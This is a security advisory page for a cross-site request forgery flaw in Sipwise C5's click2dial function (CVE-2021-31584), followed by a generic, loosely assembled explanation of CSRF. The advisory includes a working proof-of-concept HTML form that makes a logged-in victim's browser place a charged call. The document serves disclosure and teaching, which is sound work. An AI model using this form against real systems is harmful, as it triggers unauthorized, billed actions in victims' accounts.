Sipwise's application interface allows users to perform certain actions over HTTP requests without performing a validity check to verify the request. This can be utilized to perform certain actions with administrative permissions if the logged-in user visits a malicious website. Affected versions include CE_m39.3.1 and below and NGCP www_admin version 3.6.7.
 
MD5 | e7d898fb2b62a3d6bc51dbf8df132928




Sipwise C5 NGCP CSC CSRF Click2Dial Exploit


Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: <=CE_m39.3.1
NGCP www_admin version 3.6.7

Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
conferencing etc.) that can be configured by end users in the self-care web interface.
For operators, it offers a web-based administrative panel that allows them to configure
subscribers, SIP peerings, billing profiles, and other entities. The administrative web
panel also shows the real-time statistics for the whole system. For tight integration
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.

Desc: The application interface allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges if a logged-in user visits a malicious
web site.

Tested on: Apache/2.2.22 (Debian)
Apache/2.2.16 (Debian)
nginx


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2021-5649
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5649.php

CVE ID: CVE-2021-31584
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31584


13.04.2021

--


<html>
<body>
<form action="https://10.0.1.7/call/click2dial" method="POST">
<input type="hidden" name="d" value="%2B3897031337" />
<input type="submit" value="Dial and charge!" />
</form>
</body>
</html>
 
 

Cross Site Request Forgery 

Cross-site request forgery, also known as a one-click attack or riding session and abbreviated as CSRF or XSRF, is a type of malicious exploitation of websites where unauthorized commands are sent from users trusted by web applications.

Penetration Testing - Cross Site Request Forgery (CSRF)

CSRF relies on:

Points 1, 2, and 3 are important for presenting vulnerabilities, while point 4 facilitates actual exploitation, but is not entirely necessary.

  • The browser automatically sends the information used to identify the user's session. Let's say that a site is a site that hosts a web application, and the victim's user recently authenticated to the site. In response, the site sends a cookie to the victim that identifies the request sent by the victim as belonging to the victim's authenticated session. Once the browser accepts the cookie set by the site, it will automatically send it along with further requests directed to the site.
  •     If an app doesn't use session-related information in the URL, then the app URL, its parameters, and valid values can be identified. This can be done by code analysis or by accessing the application and logging forms and URLs embedded in HTML or JavaScript.
  •     "Known by browsers" refers to information such as cookies or HTTP-based authentication information (such as Basic Authentication instead of forms-based authentication), which is stored by the browser and then present in any request directed to the area of the application requesting it authentication. The vulnerability discussed next applies to applications that rely entirely on this type of information to identify user sessions.